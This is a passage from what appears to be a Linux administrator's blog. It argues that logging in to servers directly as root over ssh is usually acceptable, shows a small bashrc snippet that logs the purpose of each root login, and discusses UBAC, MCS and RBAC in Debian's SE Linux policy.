Once you have the above infrastructure for logging root login sessions it wouldn’t be difficult to run a little script that asks the sysadmin “what is the purpose for your root login” and logs what they type. If several sysadmins are logged in at the same time and one of them describes the purpose of their login as “to reconfigure LDAP” then you know who to talk to if your LDAP server stops working!
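
A sketch of that, building on the $ORIG_USER variable from above and suitable for the end of root’s .bashrc:

# ask interactive root logins for a reason and log it
if [ -n "$SSH_TTY" ]; then
  read -r -p "What is the purpose of this root login? " PURPOSE
  logger -p auth.info "user $ORIG_USER root login on $(tty): $PURPOSE"
fi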

Should you run commands with minimum privilege?

It’s generally regarded that running each command with the minimum privilege is a good idea. But if the only reason you login to a server is to do root tasks (restarting daemons, writing to files that are owned by root, etc) then there really isn’t a lot of potential for achieving anything by doing so. If you need to use a client for a particular service (EG a web browser to test the functionality of a web server or proxy server) then you can login to a different account for that purpose – the typical sysadmin desktop has a dozen xterms open at once, using one for root access to do the work and another for non-root access to do the testing is probably a good option.

Can root be used for local access?

Linux Journal has an article about the distribution that used to be known as Lindows (later Linspire) which used root as the default login for desktop use [2]. It suggests using a non-root account because “If someone can trick you into running a program or if a virus somehow runs while you are logged in, that program then has the ability to do anything at all” – of course someone could trick you into running a program or virus that attempts to run sudo (to see if you enabled it without password checks) and, if that doesn’t work, waits until you run sudo and sniffs the password (using pty interception or X event sniffing). The article does correctly note that you can easily accidentally damage your system as root. Given that the skills of typical Linux desktop users are significantly less than those of typical system administrators it seems reasonable to assume that certain risks of mistake which are significant for desktop users aren’t a big deal for skilled sysadmins.

I think that it was a bad decision by the Lindows people to use root for everything due to the risk of errors. If you make a mistake on a desktop system as non-root then if your home directory was backed up recently and you use IMAP or caching IMAP for email access then you probably won’t lose much of note. But if you make a serious mistake as root then the minimum damage is being forced to do a complete reinstall, which is time consuming and annoying even if you have the installation media handy and your Internet connection has enough quota for the month to complete the process.

Finally there are some services that seek out people who use the root account for desktop use. Debian has some support channels on IRC [3] and I decided to use the root account from my SE Linux Play Machine [4] to see how they go. #debian has banned strings matching root. #linpeople didn’t like me because “Deopped you on channel #linpeople because it is registered with channel services“. #linuxhelp and #help let me in, but nothing seemed to be happening in those channels. Last time I tried this experiment I had a minor debate with someone who repeated a mantra about not using root and didn’t show any interest in reading my explanation of why root:user_r:user_t is safe for IRC.

I can’t imagine what good the #debian people expect to gain from denying people the ability to access that channel with an IRC client that reports itself to be running as root. Doing so precludes the possibility of educating them if you think that they are doing something wrong (such as running a distribution like Lindows/Linspire).

Conclusion

I routinely ssh directly to servers as root. I’ve been doing so for as long as ssh has been around and I used to telnet to systems as root before that. Logging in to a server as root without encryption is in most cases a really bad idea, but before ssh was invented it was the only option that was available.

For the vast majority of server deployments I think that there is no good reason to avoid sshing directly as root.

UBAC and SE Linux in Debian

A recent development in SE Linux policy is the concept of UBAC (User Based Access Control) which prevents SE Linux users (identities) from accessing each other’s files.

SE Linux user identities may map 1:1 to Unix users (as was required in the early versions of SE Linux), you might have unique identities for special users and a default identity for all the other users, you might have an identity per group, or you might use some other method of assigning identities to users.

The UBAC constraints in the upstream reference policy prevent a process with a SE Linux identity other than system_u from accessing any files with an identity other than system_u. So basically any regular user can access files from the system but not from other users, and system processes (daemons) can access files from all users. Of course this is just one layer of protection, so while the UBAC constraint doesn’t prevent a user from accessing any system files, the domain-type access controls may do so.

If you used a unique SE Linux identity for each Unix account then UBAC would prevent any user from accessing a file created by another user.

For my current policy that I am considering uploading to Debian/Unstable I have allowed the identity unconfined_u to access files owned by all identities. This means that unconfined_u is an identity for administrators; if I proceed on this path then I will grant the same rights to sysadm_u.

UBAC was not enabled in Fedora last time I checked, so I’m wondering whether there is any point in including it – I don’t feel obliged to copy everything that Fedora does, but there is some benefit in maintaining compatibility across distributions.

For protecting users from each other it seems that MCS (which is Mandatory in the Debian policy) is adequate. MCS allows a much better level of access control. For example I could assign categories c0 to c10 to a set of different projects and allow the person who manages all the projects to be assigned all those categories when they login. That user could then use the command “runcon -l s0:c1 bash” to start a shell for the purpose of managing files from project 1 and any file or process created by that command would have the category c1 and be prevented from writing to a file with a different category.

Of course the down-side to removing UBAC is that since RBAC was removed there is no other way of separating SE Linux users; while MCS is good for what it does, it wasn’t designed for the purpose of isolating different types of user. So I’ll really want to get RBAC reinstalled before Squeeze is released if I remove UBAC.

Regardless of this I will need to get RBAC working on Squeeze eventually anyway. I’ve had a SE Linux Play Machine running with every release of SE Linux for the last 8 years and I don’t plan to stop now.